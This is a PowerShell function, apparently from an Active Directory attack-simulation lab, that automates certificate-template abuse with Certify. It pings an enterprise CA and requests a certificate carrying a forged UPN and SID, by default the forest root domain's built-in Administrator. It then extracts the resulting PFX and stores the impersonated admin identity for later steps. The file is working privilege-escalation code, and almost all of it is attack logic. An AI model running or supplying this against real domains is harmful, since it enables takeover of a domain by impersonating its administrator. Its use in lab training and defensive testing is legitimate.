Private/Start-RequestingCertificate.ps1
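function Start-RequestingCertificate {
    <#
    .SYNOPSIS
        Lab step: requests a certificate from an enterprise CA with Certify.

    .DESCRIPTION
        Pings the CA with "certutil -config <CA> -ping", then (after an interactive
        confirmation) runs
            <Tools>\certify.exe request --ca <CA> --template <template> --upn <altname> --sid <sid>
        and extracts the base64 PFX block from Certify's output.
        When no alternative name is supplied, the forest root domain's RID-500 account
        (resolved via Get-ADUserNameBasedOnRID) is used; its SID is always derived from
        the root domain SID. The chosen identity is published to $Script:AlternativeUser
        for later steps.

    .PARAMETER myEntCA
        Enterprise CA in "host\CA-name" form, as accepted by certutil -config / certify --ca.
    .PARAMETER CAtemplate
        Name of the certificate template to request.
    .PARAMETER altname
        Alternative UPN for the request. Empty/whitespace -> forest root RID-500 account.
    .PARAMETER domainComputer
        When $true, additionally prints the "/machine" variant of the command and asks a
        Y/N question about it. The reply is informational only; the request below always
        runs without the machine switch.

    .OUTPUTS
        [string] base64-encoded PFX, or $null when the step was skipped, the CA ping failed,
        certify.exe was not found, or no PFX block could be parsed from the output.

    .NOTES
        Depends on script-level helpers (Get-FunctionName, Write-Log, Invoke-Output,
        Write-Highlight, Get-Answer, Get-KeyValue, Get-RunTime, Get-ADUserNameBasedOnRID)
        and script-scope variables ($fgcC/$fgcF/$fgcS/$fgcV, $yes, $unAttended,
        $Script:DateFormatLog). Requires the ActiveDirectory module.
    #>
    ################################################################################
    #####           Requesting Certificate with Certify                       #####
    ################################################################################
    Param(
        [string] $myEntCA,
        [string] $CAtemplate,
        [string] $altname,
        [bool]   $domainComputer
    )

    $CurrentFunction = Get-FunctionName
    Write-Log -Message "### Start Function $CurrentFunction ###"
    $StartRunTime = (Get-Date).ToString($Script:DateFormatLog)

    #################### main code | out- host ####################

    # The SID is always the forest root domain SID + RID 500; the UPN only falls
    # back to that account when the caller did not supply an altname.
    $Forest     = Get-ADForest
    $rootdomain = Get-ADDomain -Server $Forest.Rootdomain
    $sid        = "$($rootdomain.DomainSID)-500"
    $altname1   = $altname
    if ([string]::IsNullOrWhiteSpace($altname1)) {
        $altname1 = Get-ADUserNameBasedOnRID -RID "-500" -Server $rootdomain.DNSRoot
    }

    $Script:AlternativeUser = [PSCustomObject]@{
        UPN  = $altname1
        SID  = $sid
        FQDN = $rootdomain.DNSRoot
        Role = "Admin"
    }

    # Example: ".\Certify.exe request --ca ROOT-DC19-01.WS19-ROOT.CORP\WS19-ROOT --template CH01-BadCert --upn Administrator --sid S-1-5-21-3434748730-880471986-746661712-500"
    # Display the command exactly as it is executed below (--upn, not --altname).
    Invoke-Output -Type CodeSnippet -Message "Command:"
    Write-Highlight -Text " .\certify.exe ", "request ", "--ca ", $myEntCA, " --template ", $CAtemplate, " --upn ", $altname1, " --sid ", $sid `
                    -Color $fgcC, $fgcF, $fgcS, $fgcV, $fgcS, $fgcV, $fgcS, $fgcV, $fgcS, $fgcV
    Write-Host ""

    $hostname = $env:COMPUTERNAME
    if ($domainComputer -eq $true) {
        Write-Host "`n`n Domain Computers " -ForegroundColor Yellow -NoNewline
        Write-Host "can enroll your selected template - " -NoNewline
        Write-Host "$CAtemplate" -ForegroundColor Yellow -NoNewline
        Write-Host "? `nDo you want to add the parameter - " -NoNewline
        Write-Host "/machine`n" -ForegroundColor Yellow
        Invoke-Output -Type CodeSnippet -Message "Command:"
        Write-Highlight -Text " .\certify.exe ", "request ", "/ca:", $myEntCA, " /template:", $CAtemplate, " /altname:", $altname, " /machine:", $hostname `
                        -Color $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcS, $fgcF, $fgcV
        # The reply is deliberately not acted on: the /machine variant is shown for
        # discussion only and the request further down always runs without it.
        $question = "Press - Y or N? Default "
        $null = Get-Answer -question $question -defaultValue $yes
    }

    $question = "Would you like to run this step - Y or N? Default "
    $answer   = Get-Answer -question $question -defaultValue $yes
    if ($answer -ne $yes) {
        return $null
    }

    Invoke-Output -Type Codesnippet -Message "Requesting Certificate with Certify ..."

    # Check connectivity to the enterprise CA first. The output is matched as a
    # whole (not by line index) so a short or reordered certutil response cannot
    # throw on a missing element; the exit code is checked as well.
    $pingOutput = @(certutil -config $myEntCA -ping)
    $pingText   = $pingOutput -join "`n"
    if ($LASTEXITCODE -ne 0 -or $pingText -notmatch 'successfully') {
        Write-Host "Could not reach Enterprise CA '$myEntCA':" -ForegroundColor Red
        $pingOutput | ForEach-Object { Write-Host $_ }
        return $null
    }

    # Locate certify.exe under the configured tools directory before invoking it,
    # so a misconfigured path yields a clear message instead of a terminating error.
    $Script:ASTools = Get-KeyValue -key "Tools"
    $certifyExe = Join-Path $Script:ASTools "certify.exe"
    if (-not (Test-Path -LiteralPath $certifyExe -PathType Leaf)) {
        Write-Host "certify.exe not found at '$certifyExe' (Tools path from Get-KeyValue)." -ForegroundColor Red
        return $null
    }

    $result = & $certifyExe request --ca $myEntCA --template $CAtemplate --upn $altname1 --sid $sid
    $result | Out-Host

    # Certify prints the PFX between "[*] Certificate (PFX) :" and "Certify completed".
    # Output lines are joined with newlines (which the character class allows) and all
    # whitespace is stripped so the result is a single base64 string.
    $PfxBase64 = [regex]::Match(
        ($result -join "`n"),
        '(?s)\[\*\] Certificate \(PFX\)\s*:\s*(?<pfx>[A-Za-z0-9+/=\r\n]+?)\s*Certify completed'
    ).Groups['pfx'].Value -replace '\s+', ''

    # Only report success when a PFX was actually extracted.
    if ([string]::IsNullOrEmpty($PfxBase64)) {
        Write-Host "Certify did not return a certificate (no PFX block found in its output)." -ForegroundColor Red
        return $null
    }

    Invoke-Output -Type Success -Message "Certificate Requesting with Certify was successful! The certificate is stored in variable `$PfxBase64."
    if (-not $unAttended) { pause }

    ######################## main code ############################
    $runtime = Get-RunTime -StartRunTime $StartRunTime
    Write-Log -Message " Run Time: $runtime [h] ###"
    Write-Log -Message "### End Function $CurrentFunction ###"
    return $PfxBase64
}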